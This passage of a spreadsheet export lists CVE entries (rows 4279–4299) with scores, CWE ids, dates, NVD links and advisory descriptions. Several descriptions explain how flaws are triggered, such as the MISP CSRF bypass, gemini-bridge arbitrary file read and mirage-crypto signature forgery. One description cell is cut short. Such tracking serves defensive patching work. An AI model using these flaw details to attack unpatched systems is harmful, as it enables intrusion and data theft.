        </is>
      </c>
      <c r="B4279" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41987</t>
        </is>
      </c>
      <c r="C4279" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="D4279" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4279" s="5" t="inlineStr"/>
      <c r="F4279" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4279" s="5" t="inlineStr"/>
      <c r="H4279" s="5" t="inlineStr"/>
      <c r="I4279" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4279" s="5" t="inlineStr"/>
      <c r="K4279" s="5" t="inlineStr">
        <is>
          <t>CWE-264</t>
        </is>
      </c>
      <c r="L4279" s="5" t="inlineStr">
        <is>
          <t>Permission control vulnerability in the app management module.
Impact: Successful exploitation of this vulnerability may affect availability.</t>
        </is>
      </c>
      <c r="M4279" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41987</t>
        </is>
      </c>
    </row>
    <row r="4280">
      <c r="A4280" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4280" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44846</t>
        </is>
      </c>
      <c r="C4280" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="D4280" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4280" s="5" t="inlineStr"/>
      <c r="F4280" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4280" s="5" t="inlineStr"/>
      <c r="H4280" s="5" t="inlineStr"/>
      <c r="I4280" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J4280" s="5" t="inlineStr"/>
      <c r="K4280" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L4280" s="5" t="inlineStr">
        <is>
          <t>JumpServer is an open source bastion host and an operation and maintenance security audit system. Prior to 4.10.17, a user with the users.invite_user permission can submit an existing member to POST /api/v1/users/users/invite/, causing the organization invitation logic in apps/users/api/user.py to execute user.org_roles.set(org_roles) and replace the member's existing organization roles, which can escalate privileges or downgrade administrators. This issue is fixed in version 4.10.17.</t>
        </is>
      </c>
      <c r="M4280" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44846</t>
        </is>
      </c>
    </row>
    <row r="4281">
      <c r="A4281" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4281" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49311</t>
        </is>
      </c>
      <c r="C4281" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="D4281" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4281" s="5" t="inlineStr"/>
      <c r="F4281" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4281" s="5" t="inlineStr"/>
      <c r="H4281" s="5" t="inlineStr"/>
      <c r="I4281" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4281" s="5" t="inlineStr"/>
      <c r="K4281" s="5" t="inlineStr">
        <is>
          <t>CWE-275</t>
        </is>
      </c>
      <c r="L4281" s="5" t="inlineStr">
        <is>
          <t>Permission control vulnerability in the event notification module.Impact: Successful exploitation of this vulnerability may affect availability.</t>
        </is>
      </c>
      <c r="M4281" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49311</t>
        </is>
      </c>
    </row>
    <row r="4282">
      <c r="A4282" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4282" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52295</t>
        </is>
      </c>
      <c r="C4282" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="D4282" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4282" s="5" t="inlineStr"/>
      <c r="F4282" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4282" s="5" t="inlineStr"/>
      <c r="H4282" s="5" t="inlineStr"/>
      <c r="I4282" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J4282" s="5" t="inlineStr"/>
      <c r="K4282" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="L4282" s="5" t="inlineStr">
        <is>
          <t>Buffer Overflow vulnerability in Ffmpeg v.7.0 and after allows an attacker to cause a denial of service via the libavformat/iamf_writer.c component</t>
        </is>
      </c>
      <c r="M4282" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52295</t>
        </is>
      </c>
    </row>
    <row r="4283">
      <c r="A4283" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4283" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53937</t>
        </is>
      </c>
      <c r="C4283" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="D4283" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4283" s="5" t="inlineStr"/>
      <c r="F4283" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4283" s="5" t="inlineStr"/>
      <c r="H4283" s="5" t="inlineStr"/>
      <c r="I4283" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4283" s="5" t="inlineStr"/>
      <c r="K4283" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L4283" s="5" t="inlineStr">
        <is>
          <t>MCP Kotlin SDK is the Kotlin Multiplatform software development kit for the Model Context Protocol. In versions 0.7.0 through 0.12.0, `ReadBuffer.append` in `kotlin-sdk-core/src/commonMain/kotlin/io/modelcontextprotocol/kotlin/sdk/shared/ReadBuffer.kt` writes every chunk of bytes received from the stdio transport into a `kotlinx.io.Buffer` with no size cap. Frames are extracted from that buffer only when a `\n` (0x0a) byte is observed. A peer that streams bytes without ever sending a newline causes the internal buffer to grow indefinitely until the JVM (or the surrounding host process) is OOM-killed. The leak is amplified by `StdioServerTransport` and `StdioClientTransport`, which both queue raw chunks through a `kotlinx.coroutines.channels.Channel&lt;ByteArray&gt;(Channel.UNLIMITED)` and then call `readBuffer.append(chunk)` without backpressure or size guard. This is a remote-pre-auth denial of service whenever an SDK stdio server's stdin is fed by an untrusted or attacker-controlled producer (for example: a host program that exec's the MCP server as a subprocess and pipes through bytes received from a network peer, or a sidecar wrapper that proxies bytes from an HTTP endpoint to the stdio transport). Version 0.13.0 fixes the issue.</t>
        </is>
      </c>
      <c r="M4283" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53937</t>
        </is>
      </c>
    </row>
    <row r="4284">
      <c r="A4284" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4284" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54785</t>
        </is>
      </c>
      <c r="C4284" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="D4284" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4284" s="5" t="inlineStr"/>
      <c r="F4284" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4284" s="5" t="inlineStr"/>
      <c r="H4284" s="5" t="inlineStr"/>
      <c r="I4284" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J4284" s="5" t="inlineStr"/>
      <c r="K4284" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-22</t>
        </is>
      </c>
      <c r="L4284" s="5" t="inlineStr">
        <is>
          <t>gemini-bridge is a lightweight MCP server bridging AI agents to Google's Gemini AI via the official CLI. From 1.0.0 until 1.3.1, consult_gemini_with_files in inline mode read any file path supplied in the files argument without confining it to the working directory, then forwarded the contents to the Gemini CLI. Because the caller also controls query, the file contents are echoed back through the Gemini round-trip (and sent to Google), making this an arbitrary local file read. This issue is fixed in version 1.3.1.</t>
        </is>
      </c>
      <c r="M4284" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54785</t>
        </is>
      </c>
    </row>
    <row r="4285">
      <c r="A4285" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4285" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55373</t>
        </is>
      </c>
      <c r="C4285" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="D4285" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4285" s="5" t="inlineStr"/>
      <c r="F4285" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4285" s="5" t="inlineStr"/>
      <c r="H4285" s="5" t="inlineStr"/>
      <c r="I4285" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J4285" s="5" t="inlineStr"/>
      <c r="K4285" s="5" t="inlineStr">
        <is>
          <t>CWE-190, CWE-400, CWE-835</t>
        </is>
      </c>
      <c r="L4285" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. Versions prior to 3.2.10, 3.3.12, and 3.4.13 contain an infinite-loop vulnerability in SampleCountChannel. The helper roundListSizeUp() rounds a sample-list size up to the next power of two using repeated unsigned left shifts, which terminates for normal values but fails for UINT_MAX: the sequence reaches 0x80000000, and the next left shift wraps the 32-bit value to 0. Because 0 remains less than UINT_MAX, the loop never progresses and never exits. The bug is reachable through public OpenEXRUtil APIs, either by editing the sample-count buffer through SampleCountChannel::Edit (whose destructor calls endEdit()) or by calling SampleCountChannel::set(x, y, UINT_MAX) on a valid pixel. This issue has been fixed in versions 3.2.10, 3.3.12, and 3.4.13.</t>
        </is>
      </c>
      <c r="M4285" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55373</t>
        </is>
      </c>
    </row>
    <row r="4286">
      <c r="A4286" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4286" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68499</t>
        </is>
      </c>
      <c r="C4286" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="D4286" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4286" s="5" t="inlineStr"/>
      <c r="F4286" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4286" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H4286" s="5" t="inlineStr"/>
      <c r="I4286" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J4286" s="5" t="inlineStr"/>
      <c r="K4286" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="L4286" s="5" t="inlineStr">
        <is>
          <t>re2 provides Node.js bindings for Google's RE2 regular expression engine. Prior to 1.25.2, re2's String.prototype.match implementation with a global RE2 pattern that can match the empty string fails to advance its native matching cursor in lib/match.cc, causing an infinite loop and unbounded native memory growth that blocks the event loop and can exhaust host memory. This issue is fixed in 1.25.2.</t>
        </is>
      </c>
      <c r="M4286" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68499</t>
        </is>
      </c>
    </row>
    <row r="4287">
      <c r="A4287" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4287" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71429</t>
        </is>
      </c>
      <c r="C4287" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="D4287" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4287" s="5" t="inlineStr"/>
      <c r="F4287" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4287" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H4287" s="5" t="inlineStr"/>
      <c r="I4287" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J4287" s="5" t="inlineStr"/>
      <c r="K4287" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="L4287" s="5" t="inlineStr">
        <is>
          <t>stream-json is a micro-library of stream components for processing JSON and JSONC with a minimal memory footprint. Prior to 3.5.0, the path filters pick, ignore, filter, and replace in src/core/filters/filter-base.js recompute the full path string from the nesting stack for every checkable token. Because the stack length equals the current nesting depth and a checkable token is emitted at every level, a depth D document costs O(D²) rather than O(D) to process. The issue is triggered by nesting depth rather than byte volume, including the documented pick({filter: 'data'}) traversal-until-match path, so an application that sends untrusted JSON through a string or RegExp filter can block the Node.js event loop and cause denial of service with a small deeply nested document. The streamArray, streamObject, and streamValues streamers are not affected because they use the constant-time asm.depth getter. This issue is fixed in version 3.5.0.</t>
        </is>
      </c>
      <c r="M4287" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71429</t>
        </is>
      </c>
    </row>
    <row r="4288">
      <c r="A4288" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4288" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71430</t>
        </is>
      </c>
      <c r="C4288" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="D4288" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4288" s="5" t="inlineStr"/>
      <c r="F4288" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4288" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H4288" s="5" t="inlineStr"/>
      <c r="I4288" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J4288" s="5" t="inlineStr"/>
      <c r="K4288" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="L4288" s="5" t="inlineStr">
        <is>
          <t>node-re2 p</t>
        </is>
      </c>
      <c r="M4288" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71430</t>
        </is>
      </c>
    </row>
    <row r="4289">
      <c r="A4289" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4289" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71832</t>
        </is>
      </c>
      <c r="C4289" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="D4289" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4289" s="5" t="inlineStr"/>
      <c r="F4289" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4289" s="5" t="inlineStr"/>
      <c r="H4289" s="5" t="inlineStr"/>
      <c r="I4289" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J4289" s="5" t="inlineStr"/>
      <c r="K4289" s="5" t="inlineStr">
        <is>
          <t>CWE-369</t>
        </is>
      </c>
      <c r="L4289" s="5" t="inlineStr">
        <is>
          <t>Aria2 version 1.37.0 and below is affected by a Divide By Zero issue in src/bittorrent_helper.cc, which allows a remote malicious user to cause a Denial of Service</t>
        </is>
      </c>
      <c r="M4289" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71832</t>
        </is>
      </c>
    </row>
    <row r="4290">
      <c r="A4290" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4290" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81859</t>
        </is>
      </c>
      <c r="C4290" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="D4290" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4290" s="5" t="inlineStr"/>
      <c r="F4290" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4290" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H4290" s="5" t="inlineStr"/>
      <c r="I4290" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4290" s="5" t="inlineStr"/>
      <c r="K4290" s="5" t="inlineStr">
        <is>
          <t>CWE-327</t>
        </is>
      </c>
      <c r="L4290" s="5" t="inlineStr">
        <is>
          <t>CP4BA - IBM Enterprise Records could allow a local attacker to obtain sensitive information due to the use of a broken or risky cryptographic algorithm.</t>
        </is>
      </c>
      <c r="M4290" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81859</t>
        </is>
      </c>
    </row>
    <row r="4291">
      <c r="A4291" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4291" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85547</t>
        </is>
      </c>
      <c r="C4291" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="D4291" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4291" s="5" t="inlineStr"/>
      <c r="F4291" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4291" s="5" t="inlineStr"/>
      <c r="H4291" s="5" t="inlineStr"/>
      <c r="I4291" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4291" s="5" t="inlineStr"/>
      <c r="K4291" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L4291" s="5" t="inlineStr">
        <is>
          <t>A cross-site request forgery (CSRF) vulnerability exists in MISP due to form-security and CSRF protections being disabled based on whether an incoming request was identified as a REST request.
MISP's REST detection can be influenced by request properties such as the URL suffix or the HTTP Accept header. Because Accept: application/json can be supplied by a cross-origin page without requiring a CORS preflight, an attacker could cause a request originating from another website to be treated as REST traffic. MISP would consequently disable its normal form-security and CSRF validation even though the request was authenticated using the victim's existing browser session.
An unauthenticated remote attacker could exploit this behavior by convincing an authenticated MISP user to visit or interact with a malicious web page. The attacker's page could then issue crafted requests to susceptible state-changing MISP endpoints using the victim's privileges. Depending on the permissions of the victim and the targeted endpoint, this could allow unauthorized modification, creation, publication, or removal of data and other state changes.
The vulnerability originates from granting the form-security exemption based on _isRest() rather than on the authentication mechanism used by the request. The patch changes this behavior so that CSRF and form-security exemptions are granted only when the request actually carries a MISP API key. Session-authenticated REST-style requests remain subject to CSRF protection.
The fix also introduces support for transmitting CSRF tokens through the X-CSRF-Token header for legitimate same-origin AJAX requests. Such a header cannot normally be attached by a cross-origin page without triggering a CORS preflight, preventing it from being used to reproduce the original attack.</t>
        </is>
      </c>
      <c r="M4291" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85547</t>
        </is>
      </c>
    </row>
    <row r="4292">
      <c r="A4292" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4292" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86314</t>
        </is>
      </c>
      <c r="C4292" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="D4292" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4292" s="5" t="inlineStr"/>
      <c r="F4292" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4292" s="5" t="inlineStr">
        <is>
          <t>f5</t>
        </is>
      </c>
      <c r="H4292" s="5" t="inlineStr"/>
      <c r="I4292" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4292" s="5" t="inlineStr"/>
      <c r="K4292" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L4292" s="5" t="inlineStr">
        <is>
          <t>Integer overflow in the source-bounds check in Memory::init() (src/runtime/Memory.cpp) in Samsung walrus on all platforms allows a remote attacker to cause an out-of-bounds heap read and denial of service via a crafted WebAssembly module in which a 32-bit unsigned addition wraps around and bypasses the bounds check.
This issue affects Walrus: ff3bf5ff5c4878f8e5572c9593d303f6bc997443.</t>
        </is>
      </c>
      <c r="M4292" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86314</t>
        </is>
      </c>
    </row>
    <row r="4293">
      <c r="A4293" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4293" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86315</t>
        </is>
      </c>
      <c r="C4293" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="D4293" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4293" s="5" t="inlineStr"/>
      <c r="F4293" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4293" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4293" s="5" t="inlineStr"/>
      <c r="I4293" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4293" s="5" t="inlineStr"/>
      <c r="K4293" s="5" t="inlineStr">
        <is>
          <t>CWE-197</t>
        </is>
      </c>
      <c r="L4293" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds write caused by numeric truncation  Samsung Open Source Escargot on Linux x86-64 allows an attacker who can supply JavaScript for execution to corrupt native memory and crash the host process via a crafted class definition whose instance initialization entry count exceeds UINT16_MAX.
This issue affects Escargot: 5dc93606abd42b859045add05d704a038e197359.</t>
        </is>
      </c>
      <c r="M4293" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86315</t>
        </is>
      </c>
    </row>
    <row r="4294">
      <c r="A4294" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4294" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87732</t>
        </is>
      </c>
      <c r="C4294" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="D4294" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4294" s="5" t="inlineStr"/>
      <c r="F4294" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4294" s="5" t="inlineStr"/>
      <c r="H4294" s="5" t="inlineStr"/>
      <c r="I4294" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4294" s="5" t="inlineStr"/>
      <c r="K4294" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L4294" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in the mirage-crypto package before 2.2.0 for OCaml. The AES.GCM.authenticate_decrypt_into and Chacha20.authenticate_decrypt_into functions write the decrypted plaintext into a caller-provided buffer and only then compares the tag. On a forged tag, the functions returns false, but the destination buffer already holds the full plaintext.</t>
        </is>
      </c>
      <c r="M4294" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87732</t>
        </is>
      </c>
    </row>
    <row r="4295">
      <c r="A4295" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4295" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87733</t>
        </is>
      </c>
      <c r="C4295" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="D4295" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4295" s="5" t="inlineStr"/>
      <c r="F4295" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4295" s="5" t="inlineStr"/>
      <c r="H4295" s="5" t="inlineStr"/>
      <c r="I4295" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4295" s="5" t="inlineStr"/>
      <c r="K4295" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L4295" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in the mirage-crypto-ec function before 2.2.0 for OCaml. The ECDSA functions {P256,P384,P521}.Dsa.pub_of_octets accept 0x00, the encoding of the point at infinity, as a public key. With that public key, signatures can be forged without a private key.</t>
        </is>
      </c>
      <c r="M4295" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87733</t>
        </is>
      </c>
    </row>
    <row r="4296">
      <c r="A4296" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4296" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-30983</t>
        </is>
      </c>
      <c r="C4296" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4296" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4296" s="5" t="inlineStr"/>
      <c r="F4296" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4296" s="5" t="inlineStr"/>
      <c r="H4296" s="5" t="inlineStr"/>
      <c r="I4296" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J4296" s="5" t="inlineStr"/>
      <c r="K4296" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4296" s="5" t="inlineStr">
        <is>
          <t>A cross-site scripting (XSS) vulnerability in Support chatbot in Nopaperforms Niaa-Chatbot through 2022-05-17 allows remote attackers to inject arbitrary web script or HTML via the Enter email parameter.</t>
        </is>
      </c>
      <c r="M4296" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-30983</t>
        </is>
      </c>
    </row>
    <row r="4297">
      <c r="A4297" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4297" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-24291</t>
        </is>
      </c>
      <c r="C4297" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4297" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4297" s="5" t="inlineStr"/>
      <c r="F4297" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4297" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4297" s="5" t="inlineStr">
        <is>
          <t>versa-networks:versa_director</t>
        </is>
      </c>
      <c r="I4297" s="5" t="inlineStr">
        <is>
          <t>2025-06-19</t>
        </is>
      </c>
      <c r="J4297" s="5" t="inlineStr"/>
      <c r="K4297" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="L4297" s="5"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allowing the upload of arbitrary file types. This flaw can be exploited to place a malicious file on disk. 
Versa Networks is not aware of any reported instance where this vulnerability was exploited. Proof of concept for this vulnerability has been disclosed by third party security researchers.  
There are no workarounds to disable the GUI option. Versa recommends that Director be upgraded to one of the remediated software versions.</t>
        </is>
      </c>
      <c r="M4297" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-24291</t>
        </is>
      </c>
    </row>
    <row r="4298">
      <c r="A4298" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4298" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-51684</t>
        </is>
      </c>
      <c r="C4298" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4298" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4298" s="5" t="inlineStr"/>
      <c r="F4298" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4298" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4298" s="5" t="inlineStr"/>
      <c r="I4298" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J4298" s="5" t="inlineStr"/>
      <c r="K4298" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4298" s="5" t="inlineStr">
        <is>
          <t>CleverTap Web SDK v1.15.1 is vulnerable to Cross Site Scripting (XSS). The application does not sanitize untrusted data received via window.postMessage before injecting it into the page DOM. An attacker can craft a malicious message that, when processed by renderCustomHtml, results in execution of arbitrary JavaScript in the context of the hosting site.</t>
        </is>
      </c>
      <c r="M4298" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-51684</t>
        </is>
      </c>
    </row>
    <row r="4299">
      <c r="A4299" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4299" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-7639</t>
        </is>
      </c>
      <c r="C4299" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="D4299" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4299" s="5" t="inlineStr"/>
      <c r="F4299" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4299" s="5" t="inlineStr"/>
      <c r="H4299" s="5" t="inlineStr"/>
      <c r="I4299" s="5" t="inlineStr">
        <is>
          <t>2026-08-14</t>
        </is>
      </c>
